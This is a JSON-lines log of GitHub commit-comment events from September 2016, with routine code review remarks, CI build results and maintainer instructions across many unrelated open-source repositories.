{"id":"4502915990","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":18864631,"position":null,"line":null,"path":null,"commit_id":"a94766302db22204e946b08230c568f2e07e30f8","created_at":"2016-09-01T14:28:13Z","updated_at":"2016-09-01T14:28:13Z","body":"TeamCity Glyssen :: Glyssen pull requests [Build *.*.233.a94766302db22204e946b08230c568f2e07e30f8](http://build.palaso.org/viewLog.html?buildId=76354&buildTypeId=Glyssen_GlyssenPullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 1287, ignored: 17 Build time: 00:07:31"}},"created_at":"2016-09-01T14:28:13Z"}
{"id":"4502916061","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18864632,"position":null,"line":null,"path":null,"commit_id":"144ef081d779a9a342a7ea9bcb390c4f71979b19","created_at":"2016-09-01T14:28:14Z","updated_at":"2016-09-01T14:28:14Z","body":"To PRE."}},"created_at":"2016-09-01T14:28:14Z"}
{"id":"4502916526","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18864633,"position":null,"line":null,"path":null,"commit_id":"144ef081d779a9a342a7ea9bcb390c4f71979b19","created_at":"2016-09-01T14:28:18Z","updated_at":"2016-09-01T14:28:18Z","body":"To PRO."}},"created_at":"2016-09-01T14:28:18Z"}
{"id":"4502917315","type":"CommitCommentEvent","actor":{"login":"midenok"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":18864637,"position":null,"line":null,"path":null,"commit_id":"bfe7483e47a9652a2951d2b549249f6c00784ebc","created_at":"2016-09-01T14:28:26Z","updated_at":"2016-09-01T14:28:26Z","body":"fix_period:\r\n```\r\n#!/bin/bash\r\n\r\nfix()\r\n{\r\n    find -type f -exec grep -iq '[^_\\w]period[^_\\w]' '{}' ';' -exec sed -i -re '/(^ERROR|^\\s*#|^Warning|period for)/I! {s/((^|\\W)period)([^_\\w]|$)(( ) )?/\\1_\\3\\5/ig}' '{}' ';'\r\n}\r\n\r\nfix\r\nfix\r\n```\r\n"}},"created_at":"2016-09-01T14:28:26Z"}
{"id":"4502917636","type":"CommitCommentEvent","actor":{"login":"leggetter"},"repo":{"name":"Nexmo/client-library-specification"},"payload":{"comment":{"id":18864640,"position":null,"line":null,"path":null,"commit_id":"5942a03525230f7f46bcdc9877795caf6d5407e7","created_at":"2016-09-01T14:28:29Z","updated_at":"2016-09-01T14:28:29Z","body":"Any details on _what_ should be logged? See issue description https://github.com/Nexmo/client-library-specification/issues/1#issue-151100761"}},"created_at":"2016-09-01T14:28:29Z"}
{"id":"4502919467","type":"CommitCommentEvent","actor":{"login":"NicholasBuse"},"repo":{"name":"opengapps/arm"},"payload":{"comment":{"id":18864644,"position":null,"line":null,"path":null,"commit_id":"0fc8ce687fa01ce89368529d236a199a6a5492e0","created_at":"2016-09-01T14:28:48Z","updated_at":"2016-09-01T14:28:48Z","body":"@opengapps/packagers ,\r\n\r\nSorry I had a big force push here (arm, arm64, and x86 actually). Please:\r\n\r\n```sh\r\ngit fetch -p origin\r\ngit reset --hard origin/master\r\n```"}},"created_at":"2016-09-01T14:28:48Z"}
{"id":"4502919556","type":"CommitCommentEvent","actor":{"login":"NycuRO"},"repo":{"name":"NycuRO/Apollo"},"payload":{"comment":{"id":18864646,"position":null,"line":null,"path":null,"commit_id":"86d4033a71f3392a79c8db4f5c6182cbd0e6c299","created_at":"2016-09-01T14:28:49Z","updated_at":"2016-09-01T14:28:49Z","body":"Yeah ,and now coming to Prismarine ,more more beautiful."}},"created_at":"2016-09-01T14:28:49Z"}
{"id":"4502921186","type":"CommitCommentEvent","actor":{"login":"acotiuga"},"repo":{"name":"xwiki-contrib/macro-fullcalendar"},"payload":{"comment":{"id":18864649,"position":20,"line":79,"path":"src/main/resources/Calendar/UpdateService.xml","commit_id":"a77f93f5bac63ee36bfa884f67fc454c30dd3971","created_at":"2016-09-01T14:29:05Z","updated_at":"2016-09-01T14:29:05Z","body":"Changed in ae16fdc204d63528c8db959c85c8719a2fa4b220. Hope it's better now, thanks."}},"created_at":"2016-09-01T14:29:05Z"}
{"id":"4502924109","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18864656,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T14:29:33Z","updated_at":"2016-09-01T14:29:33Z","body":"Hmm...you must've done something different to unit.cpp....land range units cannot fire off of ship anymore...\r\n\r\n![20160901092827_1](https://cloud.githubusercontent.com/assets/14372214/18171178/94e40544-7026-11e6-8b7b-d1af67d27e71.jpg)\r\n"}},"created_at":"2016-09-01T14:29:33Z"}
{"id":"4502924278","type":"CommitCommentEvent","actor":{"login":"warrenbuckley"},"repo":{"name":"umbraco/OurUmbraco"},"payload":{"comment":{"id":18864657,"position":74,"line":64,"path":"OurUmbraco/Our/Controllers/RegisterController.cs","commit_id":"00ad76fdd03a95a1e79e7c42a616177223ee9e91","created_at":"2016-09-01T14:29:35Z","updated_at":"2016-09-01T14:29:35Z","body":"Missing lat & lon @nul800sebastiaan from the our.umb test DB, be good to add these properties using a Migration & anything else new I may have missed?"}},"created_at":"2016-09-01T14:29:35Z"}
{"id":"4502924490","type":"CommitCommentEvent","actor":{"login":"brechtvdv"},"repo":{"name":"viaacode/mijn-viaa"},"payload":{"comment":{"id":18864658,"position":null,"line":null,"path":null,"commit_id":"3b3c232a99e551f06c9ef63d49997bbfc3eb2d8d","created_at":"2016-09-01T14:29:37Z","updated_at":"2016-09-01T14:29:37Z","body":"Note: log-out strategy needs to be added into the SPs metadata at the IDP"}},"created_at":"2016-09-01T14:29:37Z"}
{"id":"4502924526","type":"CommitCommentEvent","actor":{"login":"NicholasBuse"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18864659,"position":null,"line":null,"path":null,"commit_id":"99df6424fd5d88068e58b8b9216f21fc49147892","created_at":"2016-09-01T14:29:37Z","updated_at":"2016-09-01T14:29:37Z","body":"@opengapps/packagers ,\r\n\r\nSorry I had a big force push here (arm, arm64, and x86 actually). Please:\r\n\r\n```sh\r\ngit fetch -p origin\r\ngit reset --hard origin/master\r\n```"}},"created_at":"2016-09-01T14:29:37Z"}
{"id":"4502926185","type":"CommitCommentEvent","actor":{"login":"NicholasBuse"},"repo":{"name":"opengapps/x86"},"payload":{"comment":{"id":18864665,"position":null,"line":null,"path":null,"commit_id":"8829071dae0a9d95cf28f46398238d909f104d64","created_at":"2016-09-01T14:29:53Z","updated_at":"2016-09-01T14:29:53Z","body":"@opengapps/packagers ,\r\n\r\nSorry I had a big force push here (arm, arm64, and x86 actually). Please:\r\n\r\n```sh\r\ngit fetch -p origin\r\ngit reset --hard origin/master\r\n```"}},"created_at":"2016-09-01T14:29:53Z"}
{"id":"4502926948","type":"CommitCommentEvent","actor":{"login":"rotty3000"},"repo":{"name":"sez11a/liferay-docs"},"payload":{"comment":{"id":18864667,"position":11,"line":281,"path":"discover/deployment/articles-dxp/03-maintaining-liferay/02-patching-liferay.markdown","commit_id":"0f06f6535b995f8a96639c4e612437d2f759c922","created_at":"2016-09-01T14:30:00Z","updated_at":"2016-09-01T14:30:00Z","body":"This is the `${liferay.home}/work` dir only! Liferay's JSP support does not use the app server assigned scratch directories."}},"created_at":"2016-09-01T14:30:00Z"}
{"id":"4502929211","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864671,"position":21,"line":21,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:30:24Z","updated_at":"2016-09-01T14:30:24Z","body":"Don't use tags like `<center>`, use CSS instead (see https://developer.mozilla.org/en-US/docs/Web/HTML/Element/center)."}},"created_at":"2016-09-01T14:30:24Z"}
{"id":"4502931134","type":"CommitCommentEvent","actor":{"login":"ali-safari"},"repo":{"name":"MONROE-PROJECT/Utilities"},"payload":{"comment":{"id":18864675,"position":4,"line":9,"path":"monroe-experiments/usr/bin/monroe-rsync-results","commit_id":"361f6132a755b38813043102e5fc73ca0100a794","created_at":"2016-09-01T14:30:40Z","updated_at":"2016-09-01T14:30:40Z","body":"gz files should rsynced, these are Tstat logs."}},"created_at":"2016-09-01T14:30:40Z"}
{"id":"4502933077","type":"CommitCommentEvent","actor":{"login":"MCMic"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18864677,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T14:30:58Z","updated_at":"2016-09-01T14:30:58Z","body":"> In my experience, the GPL license wasn't beneficial for us. \r\nThe point of GPL is to be beneficial for the users, not for the developpers.\r\n\r\n> Mainly because Linux distribution don't make it clear that they aren't associated in any form with the original developer of each application (and other issues).\r\nI don’t see who could believe a Linux distribution to be associated with all the software available as packages for it, that does not seem plausible at all. I’m not sure I see what kind of harm it would do anyway.\r\nSo for comparison, do you see something that other software repositories like Apple Store and others do that make the distinction more visible than with GNU/Linux package repositories?"}},"created_at":"2016-09-01T14:30:58Z"}
{"id":"4502935592","type":"CommitCommentEvent","actor":{"login":"athanatos"},"repo":{"name":"aravind-ramesh/ceph"},"payload":{"comment":{"id":18864682,"position":4,"line":827,"path":"src/osd/ECBackend.cc","commit_id":"c3a986978c7a2d73028edba33477044419943f1f","created_at":"2016-09-01T14:31:23Z","updated_at":"2016-09-01T14:31:23Z","body":"Needs to be in pool config."}},"created_at":"2016-09-01T14:31:23Z"}
{"id":"4502937761","type":"CommitCommentEvent","actor":{"login":"p-decoraid"},"repo":{"name":"mazharoddin/camaleon-cms"},"payload":{"comment":{"id":18864689,"position":null,"line":null,"path":null,"commit_id":"fdca7e70e89215b4ee33b34a6175eeaac6f8ffb7","created_at":"2016-09-01T14:31:41Z","updated_at":"2016-09-01T14:31:41Z","body":"This is not quite how gemfile.lock works. In the absense of the lock file the latest acceptable versions of dependencies will be installed. If these latest versions are on your system already, they will be used, otherwise they will be downloaded and installed from rubygems.org etc. Which gems are present on a system does not influence gem selection by bundler as far as I know."}},"created_at":"2016-09-01T14:31:41Z"}
{"id":"4502939777","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864694,"position":null,"line":null,"path":null,"commit_id":"2d907f11f1420098a932a38836013b9c0d4ce712","created_at":"2016-09-01T14:31:59Z","updated_at":"2016-09-01T14:31:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 889](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12229&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T14:31:59Z"}
{"id":"4502939902","type":"CommitCommentEvent","actor":{"login":"athanatos"},"repo":{"name":"aravind-ramesh/ceph"},"payload":{"comment":{"id":18864695,"position":7,"line":830,"path":"src/osd/ECBackend.cc","commit_id":"c3a986978c7a2d73028edba33477044419943f1f","created_at":"2016-09-01T14:32:01Z","updated_at":"2016-09-01T14:32:01Z","body":"Don't actually need this, you'll be writing it to the omap on that object anyway. You probably want to prefix it with \"_checksum\" though."}},"created_at":"2016-09-01T14:32:01Z"}
{"id":"4502940197","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18864696,"position":21,"line":21,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T14:32:04Z","updated_at":"2016-09-01T14:32:04Z","body":"We should get another email alias `hi@webworkshop.ltd` or similar for this. If the Fastmail subdomain thing works as I thought, we could easily then use `hi@leigh.webworkshop.ltd`, `hi@clifton.webworkshop.ltd`."}},"created_at":"2016-09-01T14:32:04Z"}
{"id":"4502940470","type":"CommitCommentEvent","actor":{"login":"booma1"},"repo":{"name":"booma1/test"},"payload":{"comment":{"id":18864698,"position":null,"line":null,"path":null,"commit_id":"f11052244d8cbdd69caf9dcb1c292e6ea992ab9b","created_at":"2016-09-01T14:32:08Z","updated_at":"2016-09-01T14:32:08Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;S2fdPhJX&#x2F;2-az\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> az</a>"}},"created_at":"2016-09-01T14:32:08Z"}
{"id":"4502946452","type":"CommitCommentEvent","actor":{"login":"athanatos"},"repo":{"name":"aravind-ramesh/ceph"},"payload":{"comment":{"id":18864707,"position":11,"line":834,"path":"src/osd/ECBackend.cc","commit_id":"c3a986978c7a2d73028edba33477044419943f1f","created_at":"2016-09-01T14:33:06Z","updated_at":"2016-09-01T14:33:06Z","body":"k would be the same for all keys on that shard, right?  Do we need to store it?"}},"created_at":"2016-09-01T14:33:06Z"}
{"id":"4502947968","type":"CommitCommentEvent","actor":{"login":"tanbur"},"repo":{"name":"fchollet/keras"},"payload":{"comment":{"id":18864712,"position":null,"line":null,"path":null,"commit_id":"c939cebf0d73cf97a91d1ed46eb0446b6cd3e28f","created_at":"2016-09-01T14:33:19Z","updated_at":"2016-09-01T14:33:19Z","body":"Is it possible RNNs have this issue when output_dim=1?\r\nI'm getting an error in this case, but if it's not obvious I will debug it properly and post some code"}},"created_at":"2016-09-01T14:33:19Z"}
{"id":"4502958724","type":"CommitCommentEvent","actor":{"login":"mossprescott"},"repo":{"name":"mossprescott/quasar"},"payload":{"comment":{"id":18864739,"position":71,"line":71,"path":"core/src/test/scala/quasar/std/StdLibSpec.scala","commit_id":"df848119c376d80a427b5a68237ae96980886147","created_at":"2016-09-01T14:35:04Z","updated_at":"2016-09-01T14:35:04Z","body":"Well, as long as there's a code written to LogicalPlan and the StdLIb, I think we'll want a test for it. That includes both the old MongoDB connector and the simplifiers and typers. So, two questions:\r\n\r\nAre we going to have both the StdLib and the MapFuncs in the long term? That seems really cumbersome. Have we though about how we might use the new definitions in LogicalPlan, or is there a good reason to maintain two parallel libraries?\r\n\r\nIs there any reason we can't just write a single adapter that translates the tests to MapFunc and EJson, and then test the new connectors with that?\r\n\r\nBy the way, I *think* this concept will extend well to the non-mapping funcs, with some additional test methods. E.g. Given a func like `Sort` or `Filter` and a set of input values and a (possibly ordered) set of expected outputs.  Not sure how that plays with QScript."}},"created_at":"2016-09-01T14:35:04Z"}
{"id":"4502958875","type":"CommitCommentEvent","actor":{"login":"universam1"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18864741,"position":83,"line":405,"path":"TX.h","commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T14:35:06Z","updated_at":"2016-09-01T14:35:06Z","body":"Indeed - typo!"}},"created_at":"2016-09-01T14:35:06Z"}
{"id":"4502959034","type":"CommitCommentEvent","actor":{"login":"LoneGazebo"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18864742,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T14:35:08Z","updated_at":"2016-09-01T14:35:08Z","body":"@JFDaly I'll fix those few issues and get another version to you today.\r\n\r\n@Iamblichos CvUnit.cpp was added as it was uploaded for me. If something got messed up it might be related to other recent changes. I didn't mean to remove anything - github got mad at me I guess. I'll wait for your pull and then we can solve the unit.cpp issue."}},"created_at":"2016-09-01T14:35:08Z"}
{"id":"4502961878","type":"CommitCommentEvent","actor":{"login":"kozmaz87"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18864746,"position":4,"line":8,"path":"ebu_tt_live/xsd/ebutt_d.xsd","commit_id":"fe8a4a9dc3305aea1e7376b4430d4eb61da1ed96","created_at":"2016-09-01T14:35:35Z","updated_at":"2016-09-01T14:35:35Z","body":"Why did you remove these?  Is there something that this breaks? Having removed this the timing attributes on the body element have no namespace\r\n\r\n`>>> attr_en.uriTuple()\r\nOut[7]: (u'http://www.w3.org/ns/ttml', u'begin')\r\n>>> [key.uriTuple() for key in keys]\r\nOut[8]: \r\n[(None, u'end'),\r\n (None, u'begin'),\r\n (u'http://www.w3.org/ns/ttml#metadata', u'agent'),\r\n (None, u'dur'),\r\n (u'http://www.w3.org/ns/ttml#metadata', u'role')]`\r\n"}},"created_at":"2016-09-01T14:35:35Z"}
{"id":"4502964942","type":"CommitCommentEvent","actor":{"login":"packardlabs"},"repo":{"name":"Impossibeard/character-sheet-5e"},"payload":{"comment":{"id":18864752,"position":7,"line":5,"path":"app/models/character.rb","commit_id":"9decdefab6fd483aab2adcfe558ceb530f8aaa59","created_at":"2016-09-01T14:36:04Z","updated_at":"2016-09-01T14:36:04Z","body":"remove this line"}},"created_at":"2016-09-01T14:36:04Z"}
{"id":"4502965660","type":"CommitCommentEvent","actor":{"login":"packardlabs"},"repo":{"name":"Impossibeard/character-sheet-5e"},"payload":{"comment":{"id":18864754,"position":8,"line":6,"path":"app/models/character.rb","commit_id":"9decdefab6fd483aab2adcfe558ceb530f8aaa59","created_at":"2016-09-01T14:36:12Z","updated_at":"2016-09-01T14:36:12Z","body":"remove this line"}},"created_at":"2016-09-01T14:36:12Z"}
{"id":"4502967501","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18864758,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T14:36:28Z","updated_at":"2016-09-01T14:36:28Z","body":"Found it \r\nIn CvUnit::canRangeStrike()\r\n```\r\n#if defined(MOD_BALANCE_RANGED_ATTACK_ONLY_IN_NATIVE_DOMAIN)\r\n    if(!isNativeDomain(plot()))\r\n    {\r\n        return false;\r\n    }\r\n#endif\r\n```"}},"created_at":"2016-09-01T14:36:28Z"}
{"id":"4502974259","type":"CommitCommentEvent","actor":{"login":"BurtHarris"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":18864774,"position":null,"line":null,"path":null,"commit_id":"67827a1e39dc91bf66a79b04f36e9eb85e075e10","created_at":"2016-09-01T14:37:33Z","updated_at":"2016-09-01T14:37:33Z","body":"@alejo90, @vvakame : Introducing `IterableIterator<>` seems to have consequences on simple test use-cases, were these intended:\r\n\r\n```\r\nC:\\code\\DefinitelyTyped\\node>tsc node-tests\r\nnode.d.ts(512,16): error TS2304: Cannot find name 'IterableIterator'.\r\nnode.d.ts(514,13): error TS2304: Cannot find name 'IterableIterator'.\r\nnode.d.ts(515,15): error TS2304: Cannot find name 'IterableIterator'.\r\n\r\nC:\\code\\DefinitelyTyped\\node>tsc node-tests -T ES6\r\n\r\nC:\\code\\DefinitelyTyped\\node>node node-tests.js\r\nC:\\code\\DefinitelyTyped\\node\\node-tests.js:1\r\n(function (exports, require, module, __filename, __dirname) { import * as assert from \"assert\";\r\n                                                              ^^^^^^\r\nSyntaxError: Unexpected token import\r\n    at Object.exports.runInThisContext (vm.js:76:16)\r\n    at Module._compile (module.js:513:28)\r\n    at Object.Module._extensions..js (module.js:550:10)\r\n    at Module.load (module.js:458:32)\r\n    at tryModuleLoad (module.js:417:12)\r\n    at Function.Module._load (module.js:409:3)\r\n    at Module.runMain (module.js:575:10)\r\n    at run (bootstrap_node.js:352:7)\r\n    at startup (bootstrap_node.js:144:9)\r\n    at bootstrap_node.js:467:3\r\n```"}},"created_at":"2016-09-01T14:37:33Z"}
{"id":"4502974293","type":"CommitCommentEvent","actor":{"login":"claudep"},"repo":{"name":"django/django"},"payload":{"comment":{"id":18864773,"position":14,"line":77,"path":"docs/ref/contrib/gis/install/postgis.txt","commit_id":"6b54504e667da3f6bc53b887ffd7e8cc113a94b1","created_at":"2016-09-01T14:37:33Z","updated_at":"2016-09-01T14:37:33Z","body":"I think it's fine for now."}},"created_at":"2016-09-01T14:37:33Z"}
{"id":"4502977558","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"smtlb/YesAnd"},"payload":{"comment":{"id":18864780,"position":null,"line":null,"path":null,"commit_id":"9474500eaa3ced28346263e21dc9a7045598391d","created_at":"2016-09-01T14:38:06Z","updated_at":"2016-09-01T14:38:06Z","body":"Great!  *Very* good commit message too."}},"created_at":"2016-09-01T14:38:06Z"}
{"id":"4502977605","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18864781,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T14:38:07Z","updated_at":"2016-09-01T14:38:07Z","body":"I commented that out in my dll, because I like the vanilla version of ships firing within city, consequently, I commented this out in my DLL. I just need to change isNativeDomain(plot) for Cargo'ed units on ships, since everywhere else in the DLL I'm now treating that as if it were a 'native domain' for a land unit."}},"created_at":"2016-09-01T14:38:07Z"}
{"id":"4502981928","type":"CommitCommentEvent","actor":{"login":"yan-ming"},"repo":{"name":"RadeonOpenCompute/hcc"},"payload":{"comment":{"id":18864792,"position":4,"line":123,"path":"lib/hsa/mcwamp_hsa.cpp","commit_id":"f8f82c7aa46b45cbc963f61a4139637c901cfe76","created_at":"2016-09-01T14:38:47Z","updated_at":"2016-09-01T14:38:47Z","body":"Looks like this line will cause build failure? I think it's just an unexpected merge?"}},"created_at":"2016-09-01T14:38:47Z"}
{"id":"4502982902","type":"CommitCommentEvent","actor":{"login":"Aerim"},"repo":{"name":"Cilenco/FeatureDiscovery"},"payload":{"comment":{"id":18864795,"position":null,"line":null,"path":null,"commit_id":"e2f76946a68f4bfeabc762775b88d013947c7c47","created_at":"2016-09-01T14:38:57Z","updated_at":"2016-09-01T14:38:57Z","body":"Hi, sorry to post this here.\r\nFirst of all I want to thank you for a great job on the project and second I wave a question.\r\nI'm having trouble setting the background color for the dialog, no matter what color I set it to it always appears as that darkblue/violet.\r\nAny hints to point me in the right direction?\r\nThanks!"}},"created_at":"2016-09-01T14:38:57Z"}
{"id":"4502986487","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18864804,"position":null,"line":null,"path":null,"commit_id":"911b45d1dc53947a25edf764e45cd92d8ef45bd3","created_at":"2016-09-01T14:39:32Z","updated_at":"2016-09-01T14:39:32Z","body":"Indeed, I confirm that moving 1667 to QuadraticOurs gives the same bench.\r\n\r\nThe only missing thing to hxim May 2015 attempt was the adjustment to MidgameLimit and EndgameLimit...\r\n\r\n@Stefano80 please elaborate on how you found your new  MidgameLimit and EndgameLimit values."}},"created_at":"2016-09-01T14:39:32Z"}
{"id":"4502992394","type":"CommitCommentEvent","actor":{"login":"mark-dlc"},"repo":{"name":"mark-dlc/BaseRecyclerViewAdapterHelper"},"payload":{"comment":{"id":18864817,"position":null,"line":null,"path":null,"commit_id":"59bd5d5cc7bb6abf83479352e8e2aa4df7785c15","created_at":"2016-09-01T14:40:26Z","updated_at":"2016-09-01T14:40:26Z","body":"When manually manipulating the adapter list (e.g. when using `adapter.getData().add(...)` and `adapter.notifyDataSetChanged()` instead of using `adapter.addData(..)`) there was no way to trigger a completed load of data. Meaning that the 'load more' at the bottom of the list would stay visible even though more items had been successfully loaded. Now this can be done with `adapter.dataAdded()`.\r\n\r\nBehavior is similar to loadComplete, however loadComplete indicates that there is nothing to load more (i.e. the complete list is loaded). However, dataAdded simply indicates that 1 single load has been completed, but that there might still be more data to load."}},"created_at":"2016-09-01T14:40:26Z"}
{"id":"4502992678","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18864819,"position":null,"line":null,"path":null,"commit_id":"2d907f11f1420098a932a38836013b9c0d4ce712","created_at":"2016-09-01T14:40:28Z","updated_at":"2016-09-01T14:40:28Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 889](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12229&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests passed: 211, ignored: 3; exit code 1 (new) Build time: 00:08:29"}},"created_at":"2016-09-01T14:40:28Z"}
{"id":"4502993610","type":"CommitCommentEvent","actor":{"login":"FredLunnon"},"repo":{"name":"arsenovic/clifford"},"payload":{"comment":{"id":18864821,"position":null,"line":null,"path":null,"commit_id":"b8884d88f703b94906662a6c1673af043777f7b5","created_at":"2016-09-01T14:40:36Z","updated_at":"2016-09-01T14:40:36Z","body":"xcode under OSX on Mac\n\n\n\nOn 9/1/16, alex arsenovic <notifications@github.com> wrote:\n> nothing there again. ....\n>\n>\n> also if says its a binary, which doesnt make sense. what kind of editor are\n> you using?\n>\n> --\n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/arsenovic/clifford/commit/b8884d88f703b94906662a6c1673af043777f7b5#commitcomment-18863345\n"}},"created_at":"2016-09-01T14:40:36Z"}
{"id":"4502994851","type":"CommitCommentEvent","actor":{"login":"Iamblichos"},"repo":{"name":"LoneGazebo/Community-Patch-DLL"},"payload":{"comment":{"id":18864825,"position":null,"line":null,"path":null,"commit_id":"666b26dabc7b738808b414feb3561275a4433bf8","created_at":"2016-09-01T14:40:47Z","updated_at":"2016-09-01T14:40:47Z","body":"Easy stuff."}},"created_at":"2016-09-01T14:40:47Z"}
{"id":"4502995237","type":"CommitCommentEvent","actor":{"login":"trujulu"},"repo":{"name":"trujulu/android_device_jiayu_s3_h560"},"payload":{"comment":{"id":18864826,"position":null,"line":null,"path":null,"commit_id":"99a2e526c288713ee326713d99ec95c1a834a02a","created_at":"2016-09-01T14:40:50Z","updated_at":"2016-09-01T14:40:50Z","body":"If kernel is not defined we can not build"}},"created_at":"2016-09-01T14:40:50Z"}
{"id":"4502998296","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18864831,"position":null,"line":null,"path":null,"commit_id":"5ce6cd0106242648ccc9e7ea64716a866eca152c","created_at":"2016-09-01T14:41:18Z","updated_at":"2016-09-01T14:41:18Z","body":"I guess its this commit that broke something\r\nhttps://travis-ci.org/NixOS/nixpkgs/jobs/156823704"}},"created_at":"2016-09-01T14:41:18Z"}
{"id":"4502999544","type":"CommitCommentEvent","actor":{"login":"JogoShugh"},"repo":{"name":"JogoShugh/VersionOne.MetaTrain"},"payload":{"comment":{"id":18864832,"position":5,"line":116,"path":"app.coffee","commit_id":"fc80a3331f02775136857e63ab4040a5b655ce93","created_at":"2016-09-01T14:41:28Z","updated_at":"2016-09-01T14:41:28Z","body":"I noticed that I can add both -Name and +Name for the same field, for example. Shouldn't it just swap the + and -?"}},"created_at":"2016-09-01T14:41:28Z"}
{"id":"4503000665","type":"CommitCommentEvent","actor":{"login":"YeezyYeezyWhatsGood"},"repo":{"name":"NightMoon032/Flowers_Series"},"payload":{"comment":{"id":18864836,"position":13,"line":27,"path":"Flowers_Series/Utility/Tools.cs","commit_id":"dbbed7d0656086af6732d25bacd2203aa1ea285c","created_at":"2016-09-01T14:41:37Z","updated_at":"2016-09-01T14:41:37Z","body":"I like this!"}},"created_at":"2016-09-01T14:41:37Z"}
{"id":"4503000930","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":18864837,"position":null,"line":null,"path":null,"commit_id":"5eb8d78092016caa35605359ed6d2a5124fd4853","created_at":"2016-09-01T14:41:40Z","updated_at":"2016-09-01T14:41:40Z","body":"To PRE."}},"created_at":"2016-09-01T14:41:40Z"}
{"id":"4503003229","type":"CommitCommentEvent","actor":{"login":"nilaoda"},"repo":{"name":"nilaoda/M3U8-Downloader"},"payload":{"comment":{"id":18864846,"position":null,"line":null,"path":null,"commit_id":"baf1c4a9d92dda1cbbd2e8eebd018854a6d4ed16","created_at":"2016-09-01T14:42:01Z","updated_at":"2016-09-01T14:42:01Z","body":"Sourcecode."}},"created_at":"2016-09-01T14:42:01Z"}
{"id":"4503003673","type":"CommitCommentEvent","actor":{"login":"Reinmar"},"repo":{"name":"ckeditor/ckeditor5-link"},"payload":{"comment":{"id":18864847,"position":4,"line":6,"path":"tests/linkengine.js","commit_id":"fb131cd75c7f414dddc9630c68ae447e36e058d6","created_at":"2016-09-01T14:42:06Z","updated_at":"2016-09-01T14:42:06Z","body":"We may be using such tag in another repos, but they are not necessary. You can always filter by `tag:module!link`."}},"created_at":"2016-09-01T14:42:06Z"}
{"id":"4503008363","type":"CommitCommentEvent","actor":{"login":"jason800312"},"repo":{"name":"jason800312/test"},"payload":{"comment":{"id":18864860,"position":8,"line":11,"path":"ImportIone.html","commit_id":"a14fee930660a9241620d9ff8b976ceec9c45e68","created_at":"2016-09-01T14:42:49Z","updated_at":"2016-09-01T14:42:49Z","body":"ffffffff"}},"created_at":"2016-09-01T14:42:49Z"}
{"id":"4503010040","type":"CommitCommentEvent","actor":{"login":"jason800312"},"repo":{"name":"jason800312/test"},"payload":{"comment":{"id":18864865,"position":8,"line":11,"path":"ImportIone.html","commit_id":"a14fee930660a9241620d9ff8b976ceec9c45e68","created_at":"2016-09-01T14:43:05Z","updated_at":"2016-09-01T14:43:05Z","body":"ffffffffffff"}},"created_at":"2016-09-01T14:43:05Z"}
